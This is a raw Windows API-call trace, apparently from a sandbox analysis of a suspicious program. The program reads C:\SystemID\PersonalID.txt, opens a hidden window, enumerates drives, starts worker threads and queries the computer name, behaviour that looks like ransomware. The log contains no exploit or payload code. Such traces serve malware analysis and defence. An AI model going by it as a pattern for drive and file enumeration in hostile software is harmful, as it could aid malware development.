RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2cc50b8 [0172.923] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2c4f5d0, cbMultiByte=-1, lpWideCharStr=0x2cc50b8, cchWideChar=1040 | out: lpWideCharStr="C:\\$WINDOWS.~BT\\") returned 17 [0172.923] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2cda488 [0172.923] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc50b8 | out: hHeap=0x6a0000) returned 1 [0172.924] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f5d0 | out: hHeap=0x6a0000) returned 1 [0172.924] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2c4f5d0 [0172.924] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2c4f5f8 [0172.924] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f5f8 | out: hHeap=0x6a0000) returned 1 [0172.925] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f5d0 | out: hHeap=0x6a0000) returned 1 [0172.925] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x810) returned 0x2cc50b8 [0172.925] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18ea50, cbMultiByte=-1, lpWideCharStr=0x2cc50b8, cchWideChar=1032 | out: lpWideCharStr="C:\\dell\\") returned 9 [0172.925] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2cdacc0 [0172.925] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc50b8 | out: hHeap=0x6a0000) returned 1 [0172.925] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2c4f5d0 [0172.928] CreateFileW (lpFileName="C:\\SystemID\\PersonalID.txt" (normalized: "c:\\systemid\\personalid.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x18e7b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4f4 [0172.932] GetFileType (hFile=0x4f4) returned 0x1 [0172.933] ReadFile (in: hFile=0x4f4, lpBuffer=0x2cc7260, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18e820, lpOverlapped=0x0 | out: lpBuffer=0x2cc7260*, lpNumberOfBytesRead=0x18e820*=0x2a, lpOverlapped=0x0) returned 1 [0172.934] GetLastError () returned 0x0 [0172.934] ReadFile (in: hFile=0x4f4, lpBuffer=0x2cc7260, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18e820, lpOverlapped=0x0 | out: lpBuffer=0x2cc7260*, lpNumberOfBytesRead=0x18e820*=0x0, lpOverlapped=0x0) returned 1 [0172.934] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc7260 | out: hHeap=0x6a0000) returned 1 [0172.934] CloseHandle (hObject=0x4f4) returned 1 [0172.936] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fbf0 | out: hHeap=0x6a0000) returned 1 [0172.936] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6348 | out: hHeap=0x6a0000) returned 1 [0172.936] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fc58 | out: hHeap=0x6a0000) returned 1 [0172.942] CreateFileW (lpFileName="I:\\5d2860c89d774.jpg" (normalized: "i:\\5d2860c89d774.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0172.942] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0172.942] RegisterClassExW (param_1=0x18ea30) returned 0xc0fe [0172.942] CreateWindowExW (dwExStyle=0x0, lpClassName="LPCWSTRszWindowClass", lpWindowName="LPCWSTRszTitle", dwStyle=0xcf0000, X=-2147483648, Y=0, nWidth=-2147483648, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x3013e [0172.967] NtdllDefWindowProc_W () returned 0x0 [0172.967] NtdllDefWindowProc_W () returned 0x1 [0172.970] NtdllDefWindowProc_W () returned 0x0 [0172.974] NtdllDefWindowProc_W () returned 0x0 [0172.974] ShowWindow (hWnd=0x3013e, nCmdShow=0) returned 0 [0172.974] UpdateWindow (hWnd=0x3013e) returned 1 [0172.974] GetLogicalDrives () returned 0x2000004 [0172.974] SetErrorMode (uMode=0x1) returned 0x0 [0172.975] PathFileExistsA (pszPath="C:\\") returned 1 [0172.975] SetErrorMode (uMode=0x0) returned 0x1 [0172.975] GetDriveTypeA (lpRootPathName="C:\\") returned 0x3 [0172.975] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x806) returned 0x2cf9480 [0172.975] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18e9e8, cbMultiByte=-1, lpWideCharStr=0x2cf9480, cchWideChar=1027 | out: lpWideCharStr="C:\\") returned 4 [0172.975] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x810) returned 0x2cc7260 [0172.976] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cf9480 | out: hHeap=0x6a0000) returned 1 [0172.976] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x6c6348 [0172.976] SetErrorMode (uMode=0x1) returned 0x0 [0172.977] PathFileExistsA (pszPath="Z:\\") returned 1 [0172.981] SetErrorMode (uMode=0x0) returned 0x1 [0172.981] GetDriveTypeA (lpRootPathName="Z:\\") returned 0x4 [0172.981] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x806) returned 0x2cf9480 [0172.981] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18e9e8, cbMultiByte=-1, lpWideCharStr=0x2cf9480, cchWideChar=1027 | out: lpWideCharStr="Z:\\") returned 4 [0172.981] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x810) returned 0x2cc7a78 [0172.981] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cf9480 | out: hHeap=0x6a0000) returned 1 [0172.982] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b00 [0172.982] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6348 | out: hHeap=0x6a0000) returned 1 [0172.982] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc7260 | out: hHeap=0x6a0000) returned 1 [0172.982] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc7a78 | out: hHeap=0x6a0000) returned 1 [0172.983] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b00 | out: hHeap=0x6a0000) returned 1 [0172.983] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x6c6348 [0172.983] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e0f0 [0172.983] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8ec) returned 0x2cf9480 [0172.983] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x810) returned 0x2cc7260 [0172.983] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2ceae30 [0172.983] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1070) returned 0x2cc7a78 [0172.983] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fc58 [0172.983] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x810) returned 0x2cc8af0 [0172.983] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x660) returned 0x2cc9308 [0172.983] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2ceb6b8 [0172.983] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2cebf40 [0172.983] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2cec7c8 [0172.983] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2ced050 [0172.983] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2ced8d8 [0172.983] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2cc9970 [0172.983] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2cee160 [0172.983] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2cee9e8 [0172.983] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2cca1b8 [0172.983] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2ccaa00 [0172.983] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2ccb258 [0172.983] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2cef270 [0172.984] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2cefaf8 [0172.984] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2cf9d78 [0172.984] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2cfa5c0 [0172.984] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2cf0380 [0172.984] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2cf0c08 [0172.984] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2cf1490 [0172.984] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2cf1d18 [0172.985] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2cf25a0 [0172.985] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2cf2e28 [0172.985] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2cf36b0 [0172.985] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2cf3f38 [0172.985] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2cf47c0 [0172.985] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2cf5048 [0172.985] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2cfae08 [0172.985] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2cfb660 [0172.985] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2cf58d0 [0172.985] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2cf6158 [0172.985] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2cf69e0 [0172.985] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2cfbeb8 [0172.986] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2cfc700 [0172.986] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2cf7268 [0172.986] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2cf7af0 [0172.986] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2cf8378 [0172.986] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2cfcf60 [0172.987] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2cfd7e8 [0172.987] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2cfe070 [0172.987] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2cfe8f8 [0172.987] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2cff180 [0172.987] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2cffa08 [0172.987] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d0cf48 [0172.987] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d0d7a0 [0172.988] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d00290 [0172.988] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d00b18 [0172.988] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d013a0 [0172.988] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d0dff8 [0172.988] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d01c28 [0172.988] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d024b0 [0172.988] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d02d38 [0172.988] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d035c0 [0172.988] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d03e48 [0172.988] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d046d0 [0172.988] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d04f58 [0172.988] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d057e0 [0172.988] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d06068 [0172.988] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d068f0 [0172.988] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d0e840 [0172.989] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d0f098 [0172.989] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d07178 [0172.989] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d07a00 [0172.989] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d08288 [0172.989] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d08b10 [0172.989] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d09398 [0172.989] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d09c20 [0172.989] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d0a4a8 [0172.989] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d0ad30 [0172.989] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d0b5b8 [0172.989] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc0) returned 0x2c5b320 [0172.989] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d0be40 [0172.989] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x810) returned 0x2d0f8f0 [0172.989] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x810) returned 0x2d10108 [0172.989] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x810) returned 0x2d10920 [0172.990] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x810) returned 0x2d11138 [0172.990] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x810) returned 0x2d11950 [0172.990] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x810) returned 0x2d12180 [0172.991] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x810) returned 0x2d12a08 [0172.991] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fbf0 [0172.991] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d13290 [0172.991] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d13b18 [0172.991] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d143a0 [0172.991] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d14c28 [0172.991] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41f130, lpParameter=0x2cf9488, dwCreationFlags=0x0, lpThreadId=0x2c4e0f8 | out: lpThreadId=0x2c4e0f8*=0x264) returned 0x510 [0172.992] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41fd80, lpParameter=0x529238, dwCreationFlags=0x0, lpThreadId=0x529230 | out: lpThreadId=0x529230*=0x1c8) returned 0x514 [0172.992] GetMessageW (in: lpMsg=0x18ebe0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18ebe0) returned 0 [0194.883] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x800) returned 0x2d42908 [0194.883] GetComputerNameW (in: lpBuffer=0x2d42908, nSize=0x18df5c | out: lpBuffer="Q9IATRKPRH", nSize=0x18df5c) returned 1 [0194.925] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0194.925] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0194.925] IsWindow (hWnd=0x3013e) returned 1 [0194.926] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0198.668] IsWindow (hWnd=0x3013e) returned 1 [0198.668] DestroyWindow (hWnd=0x3013e) returned 1 [0198.668] NtdllDefWindowProc_W () returned 0x0 [0198.669] PostQuitMessage (nExitCode=0) [0198.670] NtdllDefWindowProc_W () returned 0x0 [0198.671] CloseHandle (hObject=0x4ec) returned 1 [0198.671] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6348 | out: hHeap=0x6a0000) returned 1 [0198.671] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4efb8 | out: hHeap=0x6a0000) returned 1 [0198.672] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4efe0 | out: hHeap=0x6a0000) returned 1 [0198.672] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f0d0 | out: hHeap=0x6a0000) returned 1 [0198.672] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f0f8 | out: hHeap=0x6a0000) returned 1 [0198.672] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f120 | out: hHeap=0x6a0000) returned 1 [0198.672] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f148 | out: hHeap=0x6a0000) returned 1 [0198.672] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9040 | out: hHeap=0x6a0000) returned 1 [0198.672] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c847b8 | out: hHeap=0x6a0000) returned 1 [0198.672] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f170 | out: hHeap=0x6a0000) returned 1 [0198.672] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f198 | out: hHeap=0x6a0000) returned 1 [0198.672] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f1c0 | out: hHeap=0x6a0000) returned 1 [0198.672] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f1e8 | out: hHeap=0x6a0000) returned 1 [0198.672] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f210 | out: hHeap=0x6a0000) returned 1 [0198.672] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f238 | out: hHeap=0x6a0000) returned 1 [0198.672] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f260 | out: hHeap=0x6a0000) returned 1 [0198.672] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84668 | out: hHeap=0x6a0000) returned 1 [0198.672] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84748 | out: hHeap=0x6a0000) returned 1 [0198.672] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f288 | out: hHeap=0x6a0000) returned 1 [0198.672] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f2b0 | out: hHeap=0x6a0000) returned 1 [0198.672] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f2d8 | out: hHeap=0x6a0000) returned 1 [0198.672] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f300 | out: hHeap=0x6a0000) returned 1 [0198.672] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f328 | out: hHeap=0x6a0000) returned 1 [0198.673] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f350 | out: hHeap=0x6a0000) returned 1 [0198.673] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f378 | out: hHeap=0x6a0000) returned 1 [0198.673] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f3a0 | out: hHeap=0x6a0000) returned 1 [0198.673] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84a20 | out: hHeap=0x6a0000) returned 1 [0198.673] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c849b0 | out: hHeap=0x6a0000) returned 1 [0198.673] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f3c8 | out: hHeap=0x6a0000) returned 1 [0198.673] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f3f0 | out: hHeap=0x6a0000) returned 1 [0198.673] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f418 | out: hHeap=0x6a0000) returned 1 [0198.673] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f440 | out: hHeap=0x6a0000) returned 1 [0198.673] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f468 | out: hHeap=0x6a0000) returned 1 [0198.673] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f490 | out: hHeap=0x6a0000) returned 1 [0198.673] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f4b8 | out: hHeap=0x6a0000) returned 1 [0198.673] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f4e0 | out: hHeap=0x6a0000) returned 1 [0198.673] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84a58 | out: hHeap=0x6a0000) returned 1 [0198.673] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84a90 | out: hHeap=0x6a0000) returned 1 [0198.673] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f508 | out: hHeap=0x6a0000) returned 1 [0198.673] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f530 | out: hHeap=0x6a0000) returned 1 [0198.673] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f558 | out: hHeap=0x6a0000) returned 1 [0198.673] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f580 | out: hHeap=0x6a0000) returned 1 [0198.673] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f5a8 | out: hHeap=0x6a0000) returned 1 [0198.674] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc6988 | out: hHeap=0x6a0000) returned 1 [0198.674] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cce648 | out: hHeap=0x6a0000) returned 1 [0198.674] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2ccf690 | out: hHeap=0x6a0000) returned 1 [0198.675] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3faf8 | out: hHeap=0x6a0000) returned 1 [0198.675] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc1938 | out: hHeap=0x6a0000) returned 1 [0198.730] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84828 | out: hHeap=0x6a0000) returned 1 [0198.731] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f048 | out: hHeap=0x6a0000) returned 1 [0198.731] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f000 | out: hHeap=0x6a0000) returned 1 [0198.732] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42580 | out: hHeap=0x6a0000) returned 1 [0198.732] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42538 | out: hHeap=0x6a0000) returned 1 [0198.732] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0198.733] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0198.733] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0198.733] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e18f8 | out: hHeap=0x6a0000) returned 1 [0198.733] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e0f0 | out: hHeap=0x6a0000) returned 1 [0198.733] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b32d0 | out: hHeap=0x6a0000) returned 1 [0198.734] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c8dc90 | out: hHeap=0x6a0000) returned 1 [0198.734] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2ce9498 | out: hHeap=0x6a0000) returned 1 [0198.734] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2ce9d20 | out: hHeap=0x6a0000) returned 1 [0198.734] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cea5a8 | out: hHeap=0x6a0000) returned 1 [0198.734] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fcc0 | out: hHeap=0x6a0000) returned 1 [0198.734] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c8d408 | out: hHeap=0x6a0000) returned 1 [0198.734] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cd1078 | out: hHeap=0x6a0000) returned 1 [0198.735] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cd0860 | out: hHeap=0x6a0000) returned 1 [0198.735] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cd0048 | out: hHeap=0x6a0000) returned 1 [0198.735] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2ce17b8 | out: hHeap=0x6a0000) returned 1 [0198.735] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2ce2820 | out: hHeap=0x6a0000) returned 1 [0198.735] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2ce5190 | out: hHeap=0x6a0000) returned 1 [0198.735] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2ce7b80 | out: hHeap=0x6a0000) returned 1 [0198.735] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x762c90 | out: hHeap=0x6a0000) returned 1 [0198.736] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cd18a0 | out: hHeap=0x6a0000) returned 1 [0198.736] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cd20c8 | out: hHeap=0x6a0000) returned 1 [0198.737] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cd2900 | out: hHeap=0x6a0000) returned 1 